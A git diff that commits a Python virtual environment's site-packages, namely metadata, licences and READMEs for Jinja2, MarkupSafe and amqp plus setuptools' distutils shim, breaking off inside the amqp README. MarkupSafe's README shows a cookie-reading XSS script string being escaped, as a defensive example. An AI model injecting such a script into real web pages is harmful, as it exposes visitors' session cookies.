diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/INSTALLER b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/LICENSE.rst b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/LICENSE.rst new file mode 100644 index 00000000..c37cae49 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2007 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/METADATA b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/METADATA new file mode 100644 index 00000000..f54bb5ca --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/METADATA @@ -0,0 +1,113 @@ +Metadata-Version: 2.1 +Name: Jinja2 +Version: 3.1.2 +Summary: A very fast and expressive template engine. 
+Home-page: https://palletsprojects.com/p/jinja/ +Author: Armin Ronacher +Author-email: armin.ronacher@active-4.com +Maintainer: Pallets +Maintainer-email: contact@palletsprojects.com +License: BSD-3-Clause +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Documentation, https://jinja.palletsprojects.com/ +Project-URL: Changes, https://jinja.palletsprojects.com/changes/ +Project-URL: Source Code, https://github.com/pallets/jinja/ +Project-URL: Issue Tracker, https://github.com/pallets/jinja/issues/ +Project-URL: Twitter, https://twitter.com/PalletsTeam +Project-URL: Chat, https://discord.gg/pallets +Platform: UNKNOWN +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content +Classifier: Topic :: Text Processing :: Markup :: HTML +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE.rst +Requires-Dist: MarkupSafe (>=2.0) +Provides-Extra: i18n +Requires-Dist: Babel (>=2.7) ; extra == 'i18n' + +Jinja +===== + +Jinja is a fast, expressive, extensible templating engine. Special +placeholders in the template allow writing code similar to Python +syntax. Then the template is passed data to render the final document. + +It includes: + +- Template inheritance and inclusion. +- Define and import macros within templates. +- HTML templates can use autoescaping to prevent XSS from untrusted + user input. +- A sandboxed environment can safely render untrusted templates. +- AsyncIO support for generating templates and calling async + functions. +- I18N support with Babel. +- Templates are compiled to optimized Python code just-in-time and + cached, or can be compiled ahead-of-time. +- Exceptions point to the correct line in templates to make debugging + easier. +- Extensible filters, tests, functions, and even syntax. + +Jinja's philosophy is that while application logic belongs in Python if +possible, it shouldn't make the template designer's job difficult by +restricting functionality too much. + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + $ pip install -U Jinja2 + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +In A Nutshell +------------- + +.. code-block:: jinja + + {% extends "base.html" %} + {% block title %}Members{% endblock %} + {% block content %} + <ul> + {% for user in users %} + <li><a href="{{ user.url }}">{{ user.username }}</a></li> + {% endfor %} + </ul> + {% endblock %} + + +Donate +------ + +The Pallets organization develops and supports Jinja and other popular +packages. In order to grow the community of contributors and users, and +allow the maintainers to devote more time to the projects, `please +donate today`_. + +..
_please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://jinja.palletsprojects.com/ +- Changes: https://jinja.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/Jinja2/ +- Source Code: https://github.com/pallets/jinja/ +- Issue Tracker: https://github.com/pallets/jinja/issues/ +- Website: https://palletsprojects.com/p/jinja/ +- Twitter: https://twitter.com/PalletsTeam +- Chat: https://discord.gg/pallets + + diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/RECORD b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/RECORD new file mode 100644 index 00000000..af42ee3c --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/RECORD @@ -0,0 +1,58 @@ +Jinja2-3.1.2.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +Jinja2-3.1.2.dist-info/LICENSE.rst,sha256=O0nc7kEF6ze6wQ-vG-JgQI_oXSUrjp3y4JefweCUQ3s,1475 +Jinja2-3.1.2.dist-info/METADATA,sha256=PZ6v2SIidMNixR7MRUX9f7ZWsPwtXanknqiZUmRbh4U,3539 +Jinja2-3.1.2.dist-info/RECORD,, +Jinja2-3.1.2.dist-info/WHEEL,sha256=G16H4A3IeoQmnOrYV4ueZGKSjhipXx8zc8nu9FGlvMA,92 +Jinja2-3.1.2.dist-info/entry_points.txt,sha256=zRd62fbqIyfUpsRtU7EVIFyiu1tPwfgO7EvPErnxgTE,59 +Jinja2-3.1.2.dist-info/top_level.txt,sha256=PkeVWtLb3-CqjWi1fO29OCbj55EhX_chhKrCdrVe_zs,7 +jinja2/__init__.py,sha256=8vGduD8ytwgD6GDSqpYc2m3aU-T7PKOAddvVXgGr_Fs,1927 +jinja2/__pycache__/__init__.cpython-310.pyc,, +jinja2/__pycache__/_identifier.cpython-310.pyc,, +jinja2/__pycache__/async_utils.cpython-310.pyc,, +jinja2/__pycache__/bccache.cpython-310.pyc,, +jinja2/__pycache__/compiler.cpython-310.pyc,, +jinja2/__pycache__/constants.cpython-310.pyc,, +jinja2/__pycache__/debug.cpython-310.pyc,, +jinja2/__pycache__/defaults.cpython-310.pyc,, +jinja2/__pycache__/environment.cpython-310.pyc,, +jinja2/__pycache__/exceptions.cpython-310.pyc,, +jinja2/__pycache__/ext.cpython-310.pyc,, +jinja2/__pycache__/filters.cpython-310.pyc,, +jinja2/__pycache__/idtracking.cpython-310.pyc,, +jinja2/__pycache__/lexer.cpython-310.pyc,, +jinja2/__pycache__/loaders.cpython-310.pyc,, +jinja2/__pycache__/meta.cpython-310.pyc,, +jinja2/__pycache__/nativetypes.cpython-310.pyc,, +jinja2/__pycache__/nodes.cpython-310.pyc,, +jinja2/__pycache__/optimizer.cpython-310.pyc,, +jinja2/__pycache__/parser.cpython-310.pyc,, +jinja2/__pycache__/runtime.cpython-310.pyc,, +jinja2/__pycache__/sandbox.cpython-310.pyc,, +jinja2/__pycache__/tests.cpython-310.pyc,, +jinja2/__pycache__/utils.cpython-310.pyc,, +jinja2/__pycache__/visitor.cpython-310.pyc,, +jinja2/_identifier.py,sha256=_zYctNKzRqlk_murTNlzrju1FFJL7Va_Ijqqd7ii2lU,1958 +jinja2/async_utils.py,sha256=dHlbTeaxFPtAOQEYOGYh_PHcDT0rsDaUJAFDl_0XtTg,2472 +jinja2/bccache.py,sha256=mhz5xtLxCcHRAa56azOhphIAe19u1we0ojifNMClDio,14061 +jinja2/compiler.py,sha256=Gs-N8ThJ7OWK4-reKoO8Wh1ZXz95MVphBKNVf75qBr8,72172 +jinja2/constants.py,sha256=GMoFydBF_kdpaRKPoM5cl5MviquVRLVyZtfp5-16jg0,1433 +jinja2/debug.py,sha256=iWJ432RadxJNnaMOPrjIDInz50UEgni3_HKuFXi2vuQ,6299 +jinja2/defaults.py,sha256=boBcSw78h-lp20YbaXSJsqkAI2uN_mD_TtCydpeq5wU,1267 +jinja2/environment.py,sha256=6uHIcc7ZblqOMdx_uYNKqRnnwAF0_nzbyeMP9FFtuh4,61349 +jinja2/exceptions.py,sha256=ioHeHrWwCWNaXX1inHmHVblvc4haO7AXsjCp3GfWvx0,5071 +jinja2/ext.py,sha256=ivr3P7LKbddiXDVez20EflcO3q2aHQwz9P_PgWGHVqE,31502 +jinja2/filters.py,sha256=9js1V-h2RlyW90IhLiBGLM2U-k6SCy2F4BUUMgB3K9Q,53509 +jinja2/idtracking.py,sha256=GfNmadir4oDALVxzn3DL9YInhJDr69ebXeA2ygfuCGA,10704 +jinja2/lexer.py,sha256=DW2nX9zk-6MWp65YR2bqqj0xqCvLtD-u9NWT8AnFRxQ,29726 
+jinja2/loaders.py,sha256=BfptfvTVpClUd-leMkHczdyPNYFzp_n7PKOJ98iyHOg,23207 +jinja2/meta.py,sha256=GNPEvifmSaU3CMxlbheBOZjeZ277HThOPUTf1RkppKQ,4396 +jinja2/nativetypes.py,sha256=DXgORDPRmVWgy034H0xL8eF7qYoK3DrMxs-935d0Fzk,4226 +jinja2/nodes.py,sha256=i34GPRAZexXMT6bwuf5SEyvdmS-bRCy9KMjwN5O6pjk,34550 +jinja2/optimizer.py,sha256=tHkMwXxfZkbfA1KmLcqmBMSaz7RLIvvItrJcPoXTyD8,1650 +jinja2/parser.py,sha256=nHd-DFHbiygvfaPtm9rcQXJChZG7DPsWfiEsqfwKerY,39595 +jinja2/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 +jinja2/runtime.py,sha256=5CmD5BjbEJxSiDNTFBeKCaq8qU4aYD2v6q2EluyExms,33476 +jinja2/sandbox.py,sha256=Y0xZeXQnH6EX5VjaV2YixESxoepnRbW_3UeQosaBU3M,14584 +jinja2/tests.py,sha256=Am5Z6Lmfr2XaH_npIfJJ8MdXtWsbLjMULZJulTAj30E,5905 +jinja2/utils.py,sha256=u9jXESxGn8ATZNVolwmkjUVu4SA-tLgV0W7PcSfPfdQ,23965 +jinja2/visitor.py,sha256=MH14C6yq24G_KVtWzjwaI7Wg14PCJIYlWW1kpkxYak0,3568 diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/WHEEL b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/WHEEL new file mode 100644 index 00000000..becc9a66 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.37.1) +Root-Is-Purelib: true +Tag: py3-none-any + diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/entry_points.txt b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/entry_points.txt new file mode 100644 index 00000000..7b9666c8 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/entry_points.txt @@ -0,0 +1,2 @@ +[babel.extractors] +jinja2 = jinja2.ext:babel_extract[i18n] diff --git a/env/Lib/site-packages/Jinja2-3.1.2.dist-info/top_level.txt b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/top_level.txt new file mode 100644 index 00000000..7f7afbf3 --- /dev/null +++ b/env/Lib/site-packages/Jinja2-3.1.2.dist-info/top_level.txt @@ -0,0 +1 @@ +jinja2 diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/INSTALLER b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/LICENSE.rst b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/LICENSE.rst new file mode 100644 index 00000000..9d227a0c --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/LICENSE.rst @@ -0,0 +1,28 @@ +Copyright 2010 Pallets + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are +met: + +1. Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + +2. Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + +3. Neither the name of the copyright holder nor the names of its + contributors may be used to endorse or promote products derived from + this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +"AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A +PARTICULAR PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT +HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, +SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED +TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR +PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF +LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING +NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS +SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/METADATA b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/METADATA new file mode 100644 index 00000000..bced1652 --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/METADATA @@ -0,0 +1,93 @@ +Metadata-Version: 2.1 +Name: MarkupSafe +Version: 2.1.3 +Summary: Safely add untrusted strings to HTML/XML markup. +Home-page: https://palletsprojects.com/p/markupsafe/ +Maintainer: Pallets +Maintainer-email: contact@palletsprojects.com +License: BSD-3-Clause +Project-URL: Donate, https://palletsprojects.com/donate +Project-URL: Documentation, https://markupsafe.palletsprojects.com/ +Project-URL: Changes, https://markupsafe.palletsprojects.com/changes/ +Project-URL: Source Code, https://github.com/pallets/markupsafe/ +Project-URL: Issue Tracker, https://github.com/pallets/markupsafe/issues/ +Project-URL: Chat, https://discord.gg/pallets +Classifier: Development Status :: 5 - Production/Stable +Classifier: Environment :: Web Environment +Classifier: Intended Audience :: Developers +Classifier: License :: OSI Approved :: BSD License +Classifier: Operating System :: OS Independent +Classifier: Programming Language :: Python +Classifier: Topic :: Internet :: WWW/HTTP :: Dynamic Content +Classifier: Topic :: Text Processing :: Markup :: HTML +Requires-Python: >=3.7 +Description-Content-Type: text/x-rst +License-File: LICENSE.rst + +MarkupSafe +========== + +MarkupSafe implements a text object that escapes characters so it is +safe to use in HTML and XML. Characters that have special meanings are +replaced so that they display as the actual characters. This mitigates +injection attacks, meaning untrusted user input can safely be displayed +on a page. + + +Installing +---------- + +Install and update using `pip`_: + +.. code-block:: text + + pip install -U MarkupSafe + +.. _pip: https://pip.pypa.io/en/stable/getting-started/ + + +Examples +-------- + +.. code-block:: pycon + + >>> from markupsafe import Markup, escape + + >>> # escape replaces special characters and wraps in Markup + >>> escape("<script>alert(document.cookie);</script>") + Markup('&lt;script&gt;alert(document.cookie);&lt;/script&gt;') + + >>> # wrap in Markup to mark text "safe" and prevent escaping + >>> Markup("<strong>Hello</strong>") + Markup('<strong>hello</strong>') + + >>> escape(Markup("<strong>Hello</strong>")) + Markup('<strong>hello</strong>') + + >>> # Markup is a str subclass + >>> # methods and operators escape their arguments + >>> template = Markup("Hello <em>{name}</em>") + >>> template.format(name='"World"') + Markup('Hello <em>&#34;World&#34;</em>') + + +Donate +------ + +The Pallets organization develops and supports MarkupSafe and other +popular packages. In order to grow the community of contributors and +users, and allow the maintainers to devote more time to the projects, +`please donate today`_. + +..
_please donate today: https://palletsprojects.com/donate + + +Links +----- + +- Documentation: https://markupsafe.palletsprojects.com/ +- Changes: https://markupsafe.palletsprojects.com/changes/ +- PyPI Releases: https://pypi.org/project/MarkupSafe/ +- Source Code: https://github.com/pallets/markupsafe/ +- Issue Tracker: https://github.com/pallets/markupsafe/issues/ +- Chat: https://discord.gg/pallets diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/RECORD b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/RECORD new file mode 100644 index 00000000..36ba525e --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/RECORD @@ -0,0 +1,14 @@ +MarkupSafe-2.1.3.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4 +MarkupSafe-2.1.3.dist-info/LICENSE.rst,sha256=RjHsDbX9kKVH4zaBcmTGeYIUM4FG-KyUtKV_lu6MnsQ,1503 +MarkupSafe-2.1.3.dist-info/METADATA,sha256=5gU_TQw6eHpTaqkI6SPeZje6KTPlJPAV82uNiL3naKE,3096 +MarkupSafe-2.1.3.dist-info/RECORD,, +MarkupSafe-2.1.3.dist-info/WHEEL,sha256=yXMlTXjHPYBFmMOeF4b9ZM_ASRm_Q54GxZmxQGPAzx4,98 +MarkupSafe-2.1.3.dist-info/top_level.txt,sha256=qy0Plje5IJuvsCBjejJyhDCjEAdcDLK_2agVcex8Z6U,11 +markupsafe/__init__.py,sha256=GsRaSTjrhvg6c88PnPJNqm4MafU_mFatfXz4-h80-Qc,10642 +markupsafe/__pycache__/__init__.cpython-310.pyc,, +markupsafe/__pycache__/_native.cpython-310.pyc,, +markupsafe/_native.py,sha256=_Q7UsXCOvgdonCgqG3l5asANI6eo50EKnDM-mlwEC5M,1776 +markupsafe/_speedups.c,sha256=n3jzzaJwXcoN8nTFyA53f3vSqsWK2vujI-v6QYifjhQ,7403 +markupsafe/_speedups.cp310-win32.pyd,sha256=1TZY4zp7C-WOSFYX9S03L2KItr-g1v-GVmTDabNfvwU,13312 +markupsafe/_speedups.pyi,sha256=f5QtwIOP0eLrxh2v5p6SmaYmlcHIGIfmz0DovaqL0OU,238 +markupsafe/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0 diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/WHEEL b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/WHEEL new file mode 100644 index 00000000..dd35916d --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/WHEEL @@ -0,0 +1,5 @@ +Wheel-Version: 1.0 +Generator: bdist_wheel (0.40.0) +Root-Is-Purelib: false +Tag: cp310-cp310-win32 + diff --git a/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/top_level.txt b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/top_level.txt new file mode 100644 index 00000000..75bf7292 --- /dev/null +++ b/env/Lib/site-packages/MarkupSafe-2.1.3.dist-info/top_level.txt @@ -0,0 +1 @@ +markupsafe diff --git a/env/Lib/site-packages/_distutils_hack/__init__.py b/env/Lib/site-packages/_distutils_hack/__init__.py new file mode 100644 index 00000000..5f40996a --- /dev/null +++ b/env/Lib/site-packages/_distutils_hack/__init__.py @@ -0,0 +1,128 @@ +import sys +import os +import re +import importlib +import warnings + + +is_pypy = '__pypy__' in sys.builtin_module_names + + +warnings.filterwarnings('ignore', + r'.+ distutils\b.+ deprecated', + DeprecationWarning) + + +def warn_distutils_present(): + if 'distutils' not in sys.modules: + return + if is_pypy and sys.version_info < (3, 7): + # PyPy for 3.6 unconditionally imports distutils, so bypass the warning + # https://foss.heptapod.net/pypy/pypy/-/blob/be829135bc0d758997b3566062999ee8b23872b4/lib-python/3/site.py#L250 + return + warnings.warn( + "Distutils was imported before Setuptools, but importing Setuptools " + "also replaces the `distutils` module in `sys.modules`. This may lead " + "to undesirable behaviors or errors. To avoid these issues, avoid " + "using distutils directly, ensure that setuptools is installed in the " + "traditional way (e.g. 
not an editable install), and/or make sure " + "that setuptools is always imported before distutils.") + + +def clear_distutils(): + if 'distutils' not in sys.modules: + return + warnings.warn("Setuptools is replacing distutils.") + mods = [name for name in sys.modules if re.match(r'distutils\b', name)] + for name in mods: + del sys.modules[name] + + +def enabled(): + """ + Allow selection of distutils by environment variable. + """ + which = os.environ.get('SETUPTOOLS_USE_DISTUTILS', 'stdlib') + return which == 'local' + + +def ensure_local_distutils(): + clear_distutils() + distutils = importlib.import_module('setuptools._distutils') + distutils.__name__ = 'distutils' + sys.modules['distutils'] = distutils + + # sanity check that submodules load as expected + core = importlib.import_module('distutils.core') + assert '_distutils' in core.__file__, core.__file__ + + +def do_override(): + """ + Ensure that the local copy of distutils is preferred over stdlib. + + See https://github.com/pypa/setuptools/issues/417#issuecomment-392298401 + for more motivation. + """ + if enabled(): + warn_distutils_present() + ensure_local_distutils() + + +class DistutilsMetaFinder: + def find_spec(self, fullname, path, target=None): + if path is not None: + return + + method_name = 'spec_for_{fullname}'.format(**locals()) + method = getattr(self, method_name, lambda: None) + return method() + + def spec_for_distutils(self): + import importlib.abc + import importlib.util + + class DistutilsLoader(importlib.abc.Loader): + + def create_module(self, spec): + return importlib.import_module('setuptools._distutils') + + def exec_module(self, module): + pass + + return importlib.util.spec_from_loader('distutils', DistutilsLoader()) + + def spec_for_pip(self): + """ + Ensure stdlib distutils when running under pip. + See pypa/pip#8761 for rationale. + """ + if self.pip_imported_during_build(): + return + clear_distutils() + self.spec_for_distutils = lambda: None + + @staticmethod + def pip_imported_during_build(): + """ + Detect if pip is being imported in a build script. Ref #2355. + """ + import traceback + return any( + frame.f_globals['__file__'].endswith('setup.py') + for frame, line in traceback.walk_stack(None) + ) + + +DISTUTILS_FINDER = DistutilsMetaFinder() + + +def add_shim(): + sys.meta_path.insert(0, DISTUTILS_FINDER) + + +def remove_shim(): + try: + sys.meta_path.remove(DISTUTILS_FINDER) + except ValueError: + pass diff --git a/env/Lib/site-packages/_distutils_hack/override.py b/env/Lib/site-packages/_distutils_hack/override.py new file mode 100644 index 00000000..2cc433a4 --- /dev/null +++ b/env/Lib/site-packages/_distutils_hack/override.py @@ -0,0 +1 @@ +__import__('_distutils_hack').do_override() diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/INSTALLER b/env/Lib/site-packages/amqp-5.1.1.dist-info/INSTALLER new file mode 100644 index 00000000..a1b589e3 --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/INSTALLER @@ -0,0 +1 @@ +pip diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/LICENSE b/env/Lib/site-packages/amqp-5.1.1.dist-info/LICENSE new file mode 100644 index 00000000..46087c2a --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/LICENSE @@ -0,0 +1,47 @@ +Copyright (c) 2015-2016 Ask Solem & contributors. All rights reserved. +Copyright (c) 2012-2014 GoPivotal, Inc. All rights reserved. +Copyright (c) 2009, 2010, 2011, 2012 Ask Solem, and individual contributors. All rights reserved. +Copyright (C) 2007-2008 Barry Pederson . All rights reserved. 
+ +py-amqp is licensed under The BSD License (3 Clause, also known as +the new BSD license). The license is an OSI approved Open Source +license and is GPL-compatible(1). + +The license text can also be found here: +http://www.opensource.org/licenses/BSD-3-Clause + +License +======= + +Redistribution and use in source and binary forms, with or without +modification, are permitted provided that the following conditions are met: + * Redistributions of source code must retain the above copyright + notice, this list of conditions and the following disclaimer. + * Redistributions in binary form must reproduce the above copyright + notice, this list of conditions and the following disclaimer in the + documentation and/or other materials provided with the distribution. + * Neither the name of Ask Solem, nor the + names of its contributors may be used to endorse or promote products + derived from this software without specific prior written permission. + +THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" +AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, +THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR +PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL Ask Solem OR CONTRIBUTORS +BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR +CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF +SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS +INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN +CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE +POSSIBILITY OF SUCH DAMAGE. + + +Footnotes +========= +(1) A GPL-compatible license makes it possible to + combine Celery with other software that is released + under the GPL, it does not mean that we're distributing + Celery under the GPL license. The BSD license, unlike the GPL, + let you distribute a modified version without making your + changes open source. diff --git a/env/Lib/site-packages/amqp-5.1.1.dist-info/METADATA b/env/Lib/site-packages/amqp-5.1.1.dist-info/METADATA new file mode 100644 index 00000000..6cd9b35c --- /dev/null +++ b/env/Lib/site-packages/amqp-5.1.1.dist-info/METADATA @@ -0,0 +1,241 @@ +Metadata-Version: 2.1 +Name: amqp +Version: 5.1.1 +Summary: Low-level AMQP client for Python (fork of amqplib). 
+Home-page: http://github.com/celery/py-amqp +Author: Barry Pederson +Author-email: pyamqp@celeryproject.org +Maintainer: Asif Saif Uddin, Matus Valo +License: BSD +Keywords: amqp rabbitmq cloudamqp messaging +Platform: any +Classifier: Development Status :: 5 - Production/Stable +Classifier: Programming Language :: Python +Classifier: Programming Language :: Python :: 3 :: Only +Classifier: Programming Language :: Python :: 3 +Classifier: Programming Language :: Python :: 3.7 +Classifier: Programming Language :: Python :: 3.8 +Classifier: Programming Language :: Python :: 3.9 +Classifier: Programming Language :: Python :: 3.10 +Classifier: Programming Language :: Python :: Implementation :: CPython +Classifier: Programming Language :: Python :: Implementation :: PyPy +Classifier: License :: OSI Approved :: BSD License +Classifier: Intended Audience :: Developers +Classifier: Operating System :: OS Independent +Requires-Python: >=3.6 +Description-Content-Type: text/x-rst +License-File: LICENSE +Requires-Dist: vine (>=5.0.0) + +===================================================================== + Python AMQP 0.9.1 client library +===================================================================== + +|build-status| |coverage| |license| |wheel| |pyversion| |pyimp| + +:Version: 5.1.1 +:Web: https://amqp.readthedocs.io/ +:Download: https://pypi.org/project/amqp/ +:Source: http://github.com/celery/py-amqp/ +:Keywords: amqp, rabbitmq + +About +===== + +This is a fork of amqplib_ which was originally written by Barry Pederson. +It is maintained by the Celery_ project, and used by `kombu`_ as a pure python +alternative when `librabbitmq`_ is not available. + +This library should be API compatible with `librabbitmq`_. + +.. _amqplib: https://pypi.org/project/amqplib/ +.. _Celery: http://celeryproject.org/ +.. _kombu: https://kombu.readthedocs.io/ +.. _librabbitmq: https://pypi.org/project/librabbitmq/ + +Differences from `amqplib`_ +=========================== + +- Supports draining events from multiple channels (``Connection.drain_events``) +- Support for timeouts +- Channels are restored after channel error, instead of having to close the + connection. +- Support for heartbeats + + - ``Connection.heartbeat_tick(rate=2)`` must called at regular intervals + (half of the heartbeat value if rate is 2). + - Or some other scheme by using ``Connection.send_heartbeat``. +- Supports RabbitMQ extensions: + - Consumer Cancel Notifications + - by default a cancel results in ``ChannelError`` being raised + - but not if a ``on_cancel`` callback is passed to ``basic_consume``. + - Publisher confirms + - ``Channel.confirm_select()`` enables publisher confirms. + - ``Channel.events['basic_ack'].append(my_callback)`` adds a callback + to be called when a message is confirmed. This callback is then + called with the signature ``(delivery_tag, multiple)``. + - Exchange-to-exchange bindings: ``exchange_bind`` / ``exchange_unbind``. + - ``Channel.confirm_select()`` enables publisher confirms. + - ``Channel.events['basic_ack'].append(my_callback)`` adds a callback + to be called when a message is confirmed. This callback is then + called with the signature ``(delivery_tag, multiple)``. + - Authentication Failure Notifications + Instead of just closing the connection abruptly on invalid + credentials, py-amqp will raise an ``AccessRefused`` error + when connected to rabbitmq-server 3.2.0 or greater. +- Support for ``basic_return`` +- Uses AMQP 0-9-1 instead of 0-8. 
+ - ``Channel.access_request`` and ``ticket`` arguments to methods + **removed**. + - Supports the ``arguments`` argument to ``basic_consume``. + - ``internal`` argument to ``exchange_declare`` removed. + - ``auto_delete`` argument to ``exchange_declare`` deprecated + - ``insist`` argument to ``Connection`` removed. + - ``Channel.alerts`` has been removed. + - Support for ``Channel.basic_recover_async``. + - ``Channel.basic_recover`` deprecated. +- Exceptions renamed to have idiomatic names: + - ``AMQPException`` -> ``AMQPError`` + - ``AMQPConnectionException`` -> ConnectionError`` + - ``AMQPChannelException`` -> ChannelError`` + - ``Connection.known_hosts`` removed. + - ``Connection`` no longer supports redirects. + - ``exchange`` argument to ``queue_bind`` can now be empty + to use the "default exchange". +- Adds ``Connection.is_alive`` that tries to detect + whether the connection can still be used. +- Adds 